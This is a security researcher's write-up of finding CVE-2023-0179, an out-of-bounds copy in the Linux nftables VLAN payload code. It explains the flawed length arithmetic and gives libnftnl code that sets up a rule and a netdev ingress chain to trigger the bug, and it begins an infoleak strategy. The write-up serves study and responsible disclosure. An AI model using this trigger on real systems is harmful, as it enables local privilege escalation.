Original text by Davide Ornaghi

The purpose of this article is to dive into the process of vulnerability research in the Linux kernel through my experience that led to the finding of CVE-2023-0179 and a fully functional Local Privilege Escalation (LPE).

By the end of this post, the reader should be more comfortable interacting with the nftables component and approaching the new mitigations encountered while exploiting the kernel stack from the network context.

1. Context

As a fresh X user indefinitely scrolling through my feed, one day I noticed a tweet about a Netfilter Use-after-Free vulnerability. Not being at all familiar with Linux exploitation, I couldn’t understand much at first, but it reminded me of some concepts I used to study for my thesis, such as kalloc zones and mach_msg spraying on iOS, which got me curious enough to explore even more writeups.

A couple of CVEs later I started noticing an emerging (and perhaps worrying) pattern: Netfilter bugs had been significantly increasing in the last months.

During my initial reads I ran into an awesome article from David Bouman titled How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables describing the internals of nftables, a Netfilter component and newer version of iptables, in great depth. By the way, I highly suggest reading Sections 1 through 3 to become familiar with the terminology before continuing.

As the subsystem internals made more sense, I started appreciating Linux kernel exploitation more and more, and decided to give myself the challenge to look for a new CVE in the nftables system in a relatively short timeframe.

2. Key aspects of nftables

Touching on the most relevant concepts of nftables, it’s worth introducing only the key elements:

- NFT tables define the traffic class to be processed (IP(v6), ARP, BRIDGE, NETDEV);

- NFT chains define at what point in the network path to process traffic (before/after/while routing);

- NFT rules: lists of expressions that decide whether to accept traffic or drop it.

In programming terms, rules can be seen as instructions and expressions are the single statements that compose them. Expressions can be of different types, and they’re collected inside the net/netfilter directory of the Linux tree, each file starting with the “nft_” prefix.

Each expression has a function table that groups several functions to be executed at a particular point in the workflow, the most important ones being .init, invoked when the rule is created, and .eval, called at runtime during rule evaluation.
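As a rough illustration of the function-table idea, here is a minimal userspace sketch. Every name in it (toy_regs, toy_expr, toy_expr_ops, toy_immediate_*) is hypothetical and only loosely modelled on the kernel's struct nft_expr_ops; it is not kernel code.

```c
#include <stdint.h>
#include <stddef.h>

/* Toy register file: 16 slots of 32 bits (hypothetical, for illustration). */
struct toy_regs {
    uint32_t data[16];
};

struct toy_expr;

/* Per-expression function table, in the spirit of struct nft_expr_ops. */
struct toy_expr_ops {
    int  (*init)(struct toy_expr *expr, uint32_t value, unsigned int dreg);
    void (*eval)(const struct toy_expr *expr, struct toy_regs *regs);
};

struct toy_expr {
    const struct toy_expr_ops *ops;
    uint32_t value;     /* private state, filled in at init time */
    unsigned int dreg;  /* destination register index */
};

/* init: runs once at rule creation and validates the user input. */
static int toy_immediate_init(struct toy_expr *expr, uint32_t value,
                              unsigned int dreg)
{
    if (dreg >= 16)
        return -1;
    expr->value = value;
    expr->dreg = dreg;
    return 0;
}

/* eval: runs for every packet that reaches the rule. */
static void toy_immediate_eval(const struct toy_expr *expr,
                               struct toy_regs *regs)
{
    regs->data[expr->dreg] = expr->value;
}

static const struct toy_expr_ops toy_immediate_ops = {
    .init = toy_immediate_init,
    .eval = toy_immediate_eval,
};
```

The split matters for auditing: any bound that init fails to enforce is trusted blindly by eval on every packet.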

Since rules and expressions can be chained together to reach a unique verdict, they have to store their state somewhere. NFT registers are temporary memory locations used to store such data.

For instance, nft_immediate stores a user-controlled immediate value into an arbitrary register, while nft_payload extracts data directly from the received socket buffer.

Registers can be referenced with a 4-byte granularity (NFT_REG32_00 through NFT_REG32_15) or with the legacy option of 16 bytes each (NFT_REG_1 through NFT_REG_4).
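The two addressing schemes overlap: both end up as an index of 32-bit words into the same register file. The sketch below shows that mapping under the assumption that the enum values match include/uapi/linux/netfilter/nf_tables.h (NFT_REG_1 = 1, NFT_REG32_00 = 8). The helper name reg_to_word_index is hypothetical.

```c
#include <stdint.h>

/* Assumed to match the uapi header values. */
#define NFT_REG_VERDICT 0u
#define NFT_REG_1       1u
#define NFT_REG_4       4u
#define NFT_REG32_00    8u
#define NFT_REG32_15    23u
#define NFT_REG_SIZE    16u
#define NFT_REG32_SIZE  4u

/* Returns the 32-bit word index inside the register file, or -1. */
static int reg_to_word_index(uint32_t reg)
{
    /* Legacy 16-byte registers: each one spans four 32-bit words. */
    if (reg <= NFT_REG_4)
        return (int)(reg * NFT_REG_SIZE / NFT_REG32_SIZE);
    /* 4-byte registers: shifted so that NFT_REG32_00 aliases NFT_REG_1. */
    if (reg >= NFT_REG32_00 && reg <= NFT_REG32_15)
        return (int)(reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00);
    return -1;
}
```

With these values NFT_REG_1 and NFT_REG32_00 both map to word 4, since the first four words belong to the verdict register.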

But what do tables, chains and rules actually look like from userland?

# nft list ruleset

table inet my_table {

chain my_chain {

type filter hook input priority filter; policy drop;

tcp dport http accept

}

}

This specific table monitors all IPv4 and IPv6 traffic. Its only chain is of the filter type, which must decide whether to keep packets or drop them. It’s installed at the input level, where traffic has already been routed to the current host, and its default verdict is to drop the packet unless a rule concludes otherwise.

The rule above is translated into different expressions that carry out the following tasks:

- Save the transport header to a register;

- Make sure it’s a TCP header;

- Save the TCP destination port to a register;

- Emit the NF_ACCEPT verdict if the register contains the value 80 (HTTP port).

Since David’s article already contains all the architectural details, I’ll just move over to the relevant aspects.

2.1 Introducing Sets and Maps

One of the advantages of nftables over iptables is the possibility to match a certain field with multiple values. For instance, if we wanted to only accept traffic directed to the HTTP and HTTPS protocols, we could implement the following rule:

nft add rule ip filter input tcp dport {http, https} accept

In this case, HTTP and HTTPS internally belong to an “anonymous set” that carries the same lifetime as the rule bound to it. When a rule is deleted, any associated set is destroyed too.

In order to make a set persistent (aka “named set”), we can just give it a name, type and values:

nft add set filter AllowedProto { type inet_service\; flags constant\;}

nft add element filter AllowedProto { http, https }

While this type of set is only useful to match against a list/range of values, nftables also provides maps, an evolution of sets behaving like the hash map data structure. One of their use cases, as mentioned in the wiki, is to pick a destination host based on the packet’s destination port:

nft add map nat porttoip { type inet_service: ipv4_addr\; }

nft add element nat porttoip { 80 : 192.168.1.100, 8888 : 192.168.1.101 }

From a programmer’s point of view, registers are like local variables, only existing in the current chain, and sets/maps are global variables persisting over consecutive chain evaluations.

2.2 Programming with nftables

Finding a potential security issue in the Linux codebase is pointless if we can’t also define a procedure to trigger it and reproduce it quite reliably. That’s why, before digging into the code, I wanted to make sure I had all the necessary tools to programmatically interact with nftables just as if I were sending commands over the terminal.

We already know that we can use the netlink interface to send messages to the subsystem via an AF_NETLINK socket but, if we want to approach nftables at a higher level, the libnftnl project contains several examples showing how to interact with its components: we can thus send create, update and delete requests to all the previously mentioned elements, and libnftnl will take care of the implementation specifics.

For this particular project, I decided to start by examining the CVE-2022-1015 exploit source since it’s based on libnftnl and implements the most repetitive tasks such as building and sending batch requests to the netlink socket. This project also comes with functions to add expressions to rules, at least the most important ones, which makes building rules really handy.

3. Scraping the attack surface

To keep things simple, I decided that I would start by auditing the expression operations, which are invoked at different times in the workflow. Let’s take the nft_payload expression as an example:

static const struct nft_expr_ops nft_payload_ops = {

.type = &nft_payload_type,

.size = NFT_EXPR_SIZE(sizeof(struct nft_payload)),

.eval = nft_payload_eval,

.init = nft_payload_init,

.dump = nft_payload_dump,

.reduce = nft_payload_reduce,

.offload = nft_payload_offload,

};

Besides eval and init, which we’ve already touched on, there are a couple other candidates to keep in mind:

- dump: reads the expression parameters and packs them into an skb. As a read-only operation, it represents an attractive attack surface for infoleaks rather than memory corruptions.

- reduce: I couldn’t find any reference to this function call, which shied me away from it.

- offload: adds support for nft_payload expression in case Flowtables are being used with hardware offload. This one definitely adds some complexity and deserves more attention in future research, although specific NIC hardware is required to reach the attack surface.

As my first research target, I ended up sticking with the same ops I started with, init and eval.

3.1 Previous vulnerabilities

We now know where to look for suspicious code, but what are we exactly looking for?

The netfilter bugs I was reading about definitely influenced the vulnerability classes in my scope:

CVE-2022-1015

/* net/netfilter/nf_tables_api.c */

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)

{

/* We can never read from the verdict register,

* so bail out if the index is 0,1,2,3 */

if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)

return -EINVAL;

/* Invalid operation, bail out */

if (len == 0)

return -EINVAL;

/* Integer overflow allows bypassing the check */

if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))

return -ERANGE;

return 0;

}

int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)

{

...

err = nft_validate_register_load(reg, len);

if (err < 0)

return err;

/* the 8 LSB from reg are written to sreg, which can be used as an index

* for read and write operations in some expressions */

*sreg = reg;

return 0;

}
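The wrap in the range check above can be reproduced in userspace. This is a minimal sketch assuming that sizeof_field(struct nft_regs, data) is 80 bytes (20 words of 4 bytes). The function names are shortened stand-ins, and the input values are picked only to make the wrap visible, not taken from the real exploit.

```c
#include <stdint.h>
#include <errno.h>

#define NFT_REG_1          1u
#define NFT_REG_SIZE       16u
#define NFT_REG32_SIZE     4u
#define NFT_REGS_DATA_SIZE 80u /* assumption: 20 registers of 4 bytes */

/* Userspace copy of the check shown above, using 32-bit unsigned math. */
static int validate_register_load(uint32_t reg, uint32_t len)
{
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    if (len == 0)
        return -EINVAL;
    /* The sum is computed modulo 2^32, so a huge reg can wrap it. */
    if (reg * NFT_REG32_SIZE + len > NFT_REGS_DATA_SIZE)
        return -ERANGE;
    return 0;
}

/* Mirrors the truncation of reg to its 8 least significant bits. */
static int parse_register_load(uint32_t reg, uint32_t len, uint8_t *sreg)
{
    int err = validate_register_load(reg, len);

    if (err < 0)
        return err;
    *sreg = (uint8_t)reg;
    return 0;
}
```

For example, reg = 0x3fffffff and len = 0x40 give 0xfffffffc + 0x40, which wraps to 0x3c and passes the check, while the stored index becomes 0xff.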

I also had a look at different subsystems, such as TIPC.

CVE-2022-0435

/* net/tipc/monitor.c */

void tipc_mon_rcv(struct net *net, void *data, u16 dlen, u32 addr,

struct tipc_mon_state *state, int bearer_id)

{

...

struct tipc_mon_domain *arrv_dom = data;

struct tipc_mon_domain dom_bef;

...

/* doesn't check for maximum new_member_cnt */

if (dlen < dom_rec_len(arrv_dom, 0))

return;

if (dlen != dom_rec_len(arrv_dom, new_member_cnt))

return;

if (dlen < new_dlen || arrv_dlen != new_dlen)

return;

...

/* Drop duplicate unless we are waiting for a probe response */

if (!more(new_gen, state->peer_gen) && !probing)

return;

...

/* Cache current domain record for later use */

dom_bef.member_cnt = 0;

dom = peer->domain;

/* memcpy with out of bounds domain record */

if (dom)

memcpy(&dom_bef, dom, dom->len);

A common pattern can be derived from these samples: if we can pass the sanity checks on a certain boundary, either via integer overflow or incorrect logic, then we can reach a write primitive which will write data out of bounds. In other words, typical buffer overflows can still be interesting!

Here is the structure of the ideal vulnerable code chunk: one or more if statements followed by a write instruction such as memcpy, memset, or simply *x = y inside all the eval and init operations of the net/netfilter/nft_*.c files.

3.2 Spotting a new bug

At this point, I downloaded the latest stable Linux release from The Linux Kernel Archives, which was 6.1.6 at the time, opened it up in my IDE (sadly not vim) and started browsing around.

I initially tried with regular expressions but I soon found it too difficult to exclude the unwanted sources and to match a write primitive with its boundary checks, plus the results were often overwhelming. Thus I moved on to the good old manual auditing strategy.

For context, this is how quickly a regex can become too complex:

if\s*\(\s*(\w+\s*[+\-*/]\s*\w+)\s*(==|!=|>|<|>=|<=)\s*(\w+\s*[+\-*/]\s*\w+)\s*\)\s*\{

It turns out that semantic analysis engines such as CodeQL and Weggli would have done a much better job. I will show how they can be used to search for similar bugs in a later article.

While exploring the nft_payload_eval function, I spotted an interesting occurrence:

/* net/netfilter/nft_payload.c */

switch (priv->base) {

case NFT_PAYLOAD_LL_HEADER:

if (!skb_mac_header_was_set(skb))

goto err;

if (skb_vlan_tag_present(skb)) {

if (!nft_payload_copy_vlan(dest, skb,

priv->offset, priv->len))

goto err;

return;

}

The nft_payload_copy_vlan function is called with two user-controlled parameters: priv->offset and priv->len. Remember that nft_payload’s purpose is to copy data from a particular layer header (IP, TCP, UDP, 802.11…) to an arbitrary register, and the user gets to specify the offset inside the header to copy data from, as well as the size of the copied chunk.

The following code snippet illustrates how to copy the destination address from the IP header to register 0 and compare it against a known value:

int create_filter_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)

{

struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);

in_addr_t d_addr;

d_addr = inet_addr("192.168.123.123");

rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof d_addr, NFT_REG32_00);

rule_add_cmp(r, NFT_CMP_EQ, NFT_REG32_00, &d_addr, sizeof d_addr);

rule_add_immediate_verdict(r, NFT_GOTO, "next_chain");

return send_batch_request(

nl,

NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),

NLM_F_CREATE, family, (void**)&r, seq,

NULL

);

}

All definitions for the rule_* functions can be found in my Github project.

When I looked at the code under nft_payload_copy_vlan, a frequent C programming pattern caught my eye:

/* net/netfilter/nft_payload.c */

if (offset + len > VLAN_ETH_HLEN + vlan_hlen)

ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;

memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

These lines determine the size of a memcpy call based on a fairly extended arithmetic operation. I later found out their purpose was to align the skb pointer to the maximum allowed offset, which is the end of the second VLAN tag (at most 2 tags are allowed). VLAN encapsulation is a common technique used by providers to separate customers inside the provider’s network and to transparently route their traffic.

At first I thought I could cause an overflow in the conditional statement, but then I realized that the uint8_t operands of the offset + len expression were being promoted to a 32-bit integer, making it impossible to wrap the sum around with 8-bit values:

<+396>: mov r11d,DWORD PTR [rbp-0x64]

<+400>: mov r10d,DWORD PTR [rbp-0x6c]

gef➤ x/wx $rbp-0x64

0xffffc90000003a0c: 0x00000004

gef➤ x/wx $rbp-0x6c

0xffffc90000003a04: 0x00000013

The compiler treats the two operands as DWORD PTR, hence 32 bits.

After this first disappointment, I started wandering elsewhere, until I came back to the same spot to double check that piece of code which kept looking suspicious.

On the next line, when assigning the ethlen variable, I noticed that the VLAN header length (4 bytes) vlan_hlen was being subtracted from ethlen instead of being added to restore the alignment with the second VLAN tag.

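By trying all possible offset and len pairs, I could confirm that some of them were actually causing ethlen to underflow, wrapping it around to a value close to UINT8_MAX. For instance, with offset 19, len 4 and vlan_hlen set to 4, the subtracted amount is 19 + 4 - 18 + 4 = 9, so the 8-bit ethlen becomes 4 - 9 = 251 modulo 256.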
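The length arithmetic can be checked in isolation with a small userspace model. It is a sketch that covers only the lines quoted above: the is_vlan_proto flag stands in for the skb->protocol test, the helper names are hypothetical, and ethlen_fixed simply flips the sign as described in the text.

```c
#include <stdint.h>
#include <stdbool.h>

#define VLAN_HLEN     4
#define VLAN_ETH_HLEN 18

/* vlan_hlen is 4 only for VLAN protocols and offsets inside the tag. */
static uint8_t vlan_hlen_for(uint8_t offset, bool is_vlan_proto)
{
    if (is_vlan_proto && offset >= VLAN_ETH_HLEN &&
        offset < VLAN_ETH_HLEN + VLAN_HLEN)
        return VLAN_HLEN;
    return 0;
}

/* Vulnerable arithmetic: vlan_hlen is added to the subtracted amount. */
static uint8_t ethlen_vulnerable(uint8_t offset, uint8_t len, bool is_vlan_proto)
{
    uint8_t vlan_hlen = vlan_hlen_for(offset, is_vlan_proto);
    uint8_t ethlen = len;

    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
    return ethlen;
}

/* Same computation with the sign of vlan_hlen flipped. */
static uint8_t ethlen_fixed(uint8_t offset, uint8_t len, bool is_vlan_proto)
{
    uint8_t vlan_hlen = vlan_hlen_for(offset, is_vlan_proto);
    uint8_t ethlen = len;

    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
    return ethlen;
}

/* A pair is suspicious when the copy size ends up larger than len. */
static bool ethlen_wraps(uint8_t offset, uint8_t len, bool is_vlan_proto)
{
    return ethlen_vulnerable(offset, len, is_vlan_proto) > len;
}
```

Looping ethlen_wraps over all 256 x 256 pairs gives a quick list of candidate inputs, although the real function applies further conditions that this model ignores.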

With a vulnerability at hand, I documented my findings and promptly sent them to the Linux kernel security team and the involved distros.

I also accidentally alerted some public mailing lists such as syzbot’s, which caused a small dispute to decide whether the issue should have been made public immediately via oss-security or not. In the end we managed to release the official patch for the stable tree in a day or two and proceeded with the disclosure process.



How an Out-Of-Bounds Copy Vulnerability works:

OOB Write: reading from an accessible memory area and subsequently writing to areas outside the destination buffer

OOB Read: reading from a memory area outside the source buffer and writing to readable areas

The behavior of CVE-2023-0179:

Expected scenario: The size of the copy operation “len” is correctly decreased to exclude restricted fields, and saved in “ethlen”

Vulnerable scenario: the value of “ethlen” is decreased below zero and wraps around to a value close to the maximum (255), allowing even inaccessible fields to be copied

4. Reaching the code path

Even the most powerful vulnerability is useless unless it can be triggered, even in a probabilistic manner; here, we’re inside the evaluation function for the nft_payload expression, which led me to believe that if the code branch was there, then it must be reachable in some way (of course this isn’t always the case).

I’ve already shown how to set up the vulnerable rule. We just have to choose an overflowing offset/length pair like so:

uint8_t offset = 19, len = 4;

struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);

rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

Once the rule is in place, we have to force its evaluation by generating some traffic. Unfortunately, normal traffic won’t pass through the nft_payload_copy_vlan function; only VLAN-tagged packets will.

4.1 Debugging nftables

From here on, gdb’s assistance proved to be crucial to trace the network paths for input packets.

I chose to spin up a QEMU instance with debugging support, since it’s really easy to feed it your own kernel image and rootfs, and then attach gdb from the host.

When booting from QEMU, it will be more practical to have the kernel modules you need automatically loaded:

# not all configs are required for this bug

CONFIG_VLAN_8021Q=y

CONFIG_VETH=y

CONFIG_BRIDGE=y

CONFIG_BRIDGE_NETFILTER=y

CONFIG_NF_TABLES=y

CONFIG_NF_TABLES_INET=y

CONFIG_NF_TABLES_NETDEV=y

CONFIG_NF_TABLES_IPV4=y

CONFIG_NF_TABLES_ARP=y

CONFIG_NF_TABLES_BRIDGE=y

CONFIG_USER_NS=y

CONFIG_CMDLINE_BOOL=y

CONFIG_CMDLINE="net.ifnames=0"

As for the initial root file system, one with the essential networking utilities can be built for x86_64 (openssh, bridge-utils, nft) by following this guide. Alternatively, syzkaller provides the create-image.sh script which automates the process.

Once everything is ready, QEMU can be run with custom options, for instance:

qemu-system-x86_64 -kernel linuxk/linux-6.1.6/vmlinux -drive format=raw,file=linuxk/buildroot/output/images/rootfs.ext4,if=virtio -nographic -append "root=/dev/vda console=ttyS0" -net nic,model=e1000 -net user,hostfwd=tcp::10022-:22,hostfwd=udp::5556-:1337

This setup allows communicating with the emulated OS via SSH on ports 10022:22 and via UDP on ports 5556:1337. Notice how the host and the emulated NIC are connected indirectly via a virtual hub and aren’t placed on the same segment.

After booting the kernel up, the remote debugger is accessible on local port 1234 (provided QEMU was started with its gdb stub enabled, e.g. through the -s option), hence we can set the required breakpoints:

turtlearm@turtlelinux:~/linuxk/old/linux-6.1.6$ gdb vmlinux

GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1

...

88 commands loaded and 5 functions added for GDB 12.1 in 0.01ms using Python engine 3.10

Reading symbols from vmlinux...

gef➤ target remote :1234

Remote debugging using :1234

(remote) gef➤ info b

Num Type Disp Enb Address What

1 breakpoint keep y 0xffffffff81c47d50 in nft_payload_eval at net/netfilter/nft_payload.c:133

2 breakpoint keep y 0xffffffff81c47ebf in nft_payload_copy_vlan at net/netfilter/nft_payload.c:64

Now, hitting breakpoint 2 will confirm that we successfully entered the vulnerable path.

4.2 Main issues

How can I send a packet which definitely enters the correct path? Answering this question was more troublesome than expected.

UDP is definitely easier to handle than TCP, but a UDP socket (SOCK_DGRAM) wouldn’t let me add a VLAN header (layer 2), and using a raw socket was out of the question as it would bypass the network stack, including the NFT hooks.

Instead of crafting my own packets, I just tried configuring a VLAN interface on the ethernet device eth0:

ip link add link eth0 name vlan.10 type vlan id 10

ip addr add 192.168.10.137/24 dev vlan.10

ip link set vlan.10 up

With these commands I could bind a UDP socket to the vlan.10 interface and hope that I would detect VLAN-tagged packets leaving through eth0. Of course, that wasn’t the case because the new interface wasn’t holding the necessary routes, and only ARP requests were being produced.

Another attempt involved replicating the physical use case of encapsulated VLANs (Q-in-Q) but in my local network to see what I would receive on the destination host.

Surprisingly, after setting up the same VLAN and subnet on both machines, I managed to emit VLAN-tagged packets from the source host but, no matter how many tags I embedded, they were all being stripped out from the datagram when reaching the destination interface.

This behavior is due to Linux acting as a router. Since a VLAN ends when a router is met, being a layer 2 protocol, it would be useless for Netfilter to process those tags.

Going back to the kernel source, I was able to spot the exact point where the tag was being stripped out during a process called VLAN offloading, where the NIC driver removes the tag and forwards traffic to the networking stack.

The __netif_receive_skb_core function takes the previously crafted skb and delivers it to the upper protocol layers by calling deliver_skb.

802.1q packets are subject to VLAN offloading here:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc,

struct packet_type **ppt_prev)

{

...

if (eth_type_vlan(skb->protocol)) {

skb = skb_vlan_untag(skb);

if (unlikely(!skb))

goto out;

}

...

}

skb_vlan_untag also sets the vlan_tci, vlan_proto, and vlan_present fields of the skb so that the network stack can later fetch the VLAN information if needed.
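To make the fields involved more concrete, here is a minimal userspace sketch that extracts the same information from a raw Ethernet frame. It is not how skb_vlan_untag is implemented: struct vlan_info and parse_vlan_tag are hypothetical names, and only the 802.1Q/802.1ad tag layout (TPID followed by a 16-bit TCI) is taken from the standard.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>

#define ETH_ALEN     6
#define ETH_P_8021Q  0x8100
#define ETH_P_8021AD 0x88A8

struct vlan_info {
    uint16_t proto;       /* TPID: 0x8100 or 0x88A8 */
    uint16_t tci;         /* priority, DEI and VLAN ID */
    uint16_t vid;         /* low 12 bits of the TCI */
    uint16_t inner_proto; /* EtherType that follows the tag */
};

/* Reads a big-endian (network order) 16-bit value. */
static uint16_t read_be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* Returns true and fills out if the frame carries an outer VLAN tag. */
static bool parse_vlan_tag(const uint8_t *frame, size_t len,
                           struct vlan_info *out)
{
    uint16_t tpid;

    /* dst MAC + src MAC + TPID + TCI + inner EtherType = 18 bytes */
    if (len < 2 * ETH_ALEN + 4 + 2)
        return false;

    tpid = read_be16(frame + 2 * ETH_ALEN);
    if (tpid != ETH_P_8021Q && tpid != ETH_P_8021AD)
        return false;

    out->proto = tpid;
    out->tci = read_be16(frame + 2 * ETH_ALEN + 2);
    out->vid = out->tci & 0x0fff;
    out->inner_proto = read_be16(frame + 2 * ETH_ALEN + 4);
    return true;
}
```

The 18 bytes consumed here correspond to VLAN_ETH_HLEN, the constant used by the vulnerable length computation.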

The function then calls all tap handlers like the protocol sniffers that are listed inside the ptype_all list and finally enters another branch that deals with VLAN packets:

/* net/core/dev.c */

if (skb_vlan_tag_present(skb)) {

if (pt_prev) {

ret = deliver_skb(skb, pt_prev, orig_dev);

pt_prev = NULL;

}

if (vlan_do_receive(&skb)) {

goto another_round;

}

else if (unlikely(!skb))

goto out;

}

The main actor here is vlan_do_receive that actually delivers the 802.1q packet to the appropriate VLAN port. If it finds the appropriate interface, the vlan_present field is reset and another round of __netif_receive_skb_core is performed, this time as an untagged packet with the new device interface.

However, these 3 lines got me curious because they allowed skipping the vlan_present reset part and going straight to the IP receive handlers with the 802.1q packet, which is what I needed to reach the nft hooks:

/* net/8021q/vlan_core.c */

vlan_dev = vlan_find_dev(skb->dev, vlan_proto, vlan_id);

if (!vlan_dev) // if it cannot find vlan dev, go back to netif_receive_skb_core and don't untag

return false;

...

__vlan_hwaccel_clear_tag(skb); // unset vlan_present flag, making skb_vlan_tag_present false

Remember that the vulnerable code path requires vlan_present to be set (from skb_vlan_tag_present(skb)), so if I sent a packet from a VLAN-aware interface to a VLAN-unaware interface, vlan_do_receive would return false without unsetting the present flag, and that would be perfect in theory.

One more problem arose at this point: the nft_payload_copy_vlan function requires the skb protocol to be either ETH_P_8021AD or ETH_P_8021Q, otherwise vlan_hlen won’t be assigned and the code path won’t be taken:

/* net/netfilter/nft_payload.c */

static bool nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)

{

...

if ((skb->protocol == htons(ETH_P_8021AD) ||

skb->protocol == htons(ETH_P_8021Q)) &&

offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)

vlan_hlen += VLAN_HLEN;

Unfortunately, skb_vlan_untag will also reset the inner protocol, making this branch impossible to enter. In the end, this path turned out to be a rabbit hole.

While thinking about a different approach I remembered that, since VLAN is a layer 2 protocol, I should have probably turned Ubuntu into a bridge and saved the NFT rules inside the NFPROTO_BRIDGE hooks.

To achieve that, a way to merge the features of a bridge and a VLAN device was needed. Enter VLAN filtering!

This feature was introduced in Linux kernel 3.8 and allows using different subnets with multiple guests on a virtualization server (KVM/QEMU) without manually creating VLAN interfaces but only using one bridge.

After creating the bridge, I had to enter promiscuous mode to always reach the NF_BR_LOCAL_IN bridge hook:

/* net/bridge/br_input.c */

static int br_pass_frame_up(struct sk_buff *skb) {

...

/* Bridge is just like any other port. Make sure the

* packet is allowed except in promisc mode when someone

* may be running packet capture.

*/

if (!(brdev->flags & IFF_PROMISC) &&

!br_allowed_egress(vg, skb)) {

kfree_skb(skb);

return NET_RX_DROP;

}

...

return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,

dev_net(indev), NULL, skb, indev, NULL,

br_netif_receive_skb);

and finally enable VLAN filtering to enter the br_handle_vlan function (/net/bridge/br_vlan.c) and avoid any __vlan_hwaccel_clear_tag call inside the bridge module.

sudo ip link set br0 type bridge vlan_filtering 1

sudo ip link set br0 promisc on

While this configuration seemed to work at first, it became unstable after a very short time, since when vlan_filtering kicked in I stopped receiving traffic.

All previous attempts weren’t nearly as reliable as I needed them to be in order to proceed to the exploitation stage. Nevertheless, I learned a lot about the networking stack and the Netfilter implementation.

4.3 The Netfilter Holy Grail

Netfilter hooks

While I could’ve continued looking for ways to stabilize VLAN filtering, I opted for a handier way to trigger the bug.

This chart was taken from the nftables wiki and represents all possible packet flows for each family. The netdev family is of particular interest since its hooks are located at the very beginning, in the Ingress hook.

According to this article the netdev family is attached to a single network interface and sees all network traffic (L2+L3+ARP).

Going back to __netif_receive_skb_core I noticed how the ingress handler was called before vlan_do_receive (which removes the vlan_present flag), meaning that if I could register a NFT hook there, it would have full visibility over the VLAN information:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc, struct packet_type **ppt_prev) {

...

#ifdef CONFIG_NET_INGRESS

...

if (nf_ingress(skb, &pt_prev, &ret, orig_dev) < 0) // insert hook here

goto out;

#endif

...

if (skb_vlan_tag_present(skb)) {

if (pt_prev) {

ret = deliver_skb(skb, pt_prev, orig_dev);

pt_prev = NULL;

}

if (vlan_do_receive(&skb)) // delete vlan info

goto another_round;

else if (unlikely(!skb))

goto out;

}

...

The convenient part is that you don’t even have to receive the actual packets to trigger such hooks because in normal network conditions you will always(?) get the respective ARP requests on broadcast, also carrying the same VLAN tag!

Here’s how to create a base chain belonging to the netdev family:

struct nftnl_chain* c;

c = nftnl_chain_alloc();

nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);

nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);

if (dev_name)

nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); // set device name

if (base_param) { // set ingress hook number and max priority

nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);

nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, INT_MIN);

}

And that’s it, you can now send random traffic from a VLAN-aware interface to the chosen network device and the ARP requests will trigger the vulnerable code path.

64 bytes and a ROP chain – A journey through nftables – Part 2

2.1. Getting an infoleak

Can I turn this bug into something useful? At this point I somewhat had an idea that would allow me to leak some data, although I wasn’t sure what kind of data would have come out of the stack.

The idea was to overflow into the first NFT register (NFT_REG32_00) so that all the remaining ones would contain the mysterious data. It wasn’t clear to me how to extract this leak at first, until I vaguely remembered the nft_dynset expression from CVE-2022-1015, which inserts key:data pairs into a hashmap-like data structure (actually an nft_set) that can later be fetched from userland. Since we can add registers to the dynset, we can reference them like so:

key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8)

This solution should allow avoiding duplicate keys, but we should still check that all key registers contain different values, otherwise we will lose their values.
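The duplicate-key concern can be expressed as a small check over a snapshot of the sixteen registers. The sketch assumes the pairing above (registers 0 to 7 as keys, 8 to 15 as values); keys_are_unique and surviving_pairs are hypothetical helpers, not part of any exploit code.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

#define NUM_REGS  16
#define NUM_PAIRS 8 /* key[i] = regs[i], value[i] = regs[i + 8] */

/* True when all eight key registers hold different values. */
static bool keys_are_unique(const uint32_t regs[NUM_REGS])
{
    for (size_t i = 0; i < NUM_PAIRS; i++)
        for (size_t j = i + 1; j < NUM_PAIRS; j++)
            if (regs[i] == regs[j])
                return false;
    return true;
}

/* Number of distinct keys, i.e. how many pairs a map could retain. */
static size_t surviving_pairs(const uint32_t regs[NUM_REGS])
{
    size_t count = 0;

    for (size_t i = 0; i < NUM_PAIRS; i++) {
        bool seen_before = false;

        for (size_t j = 0; j < i; j++)
            if (regs[j] == regs[i])
                seen_before = true;
        if (!seen_before)
            count++;
    }
    return count;
}
```

Zeroed registers are the most likely source of collisions, since several untouched keys would all be 0.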

2.1.1 Returning the registers

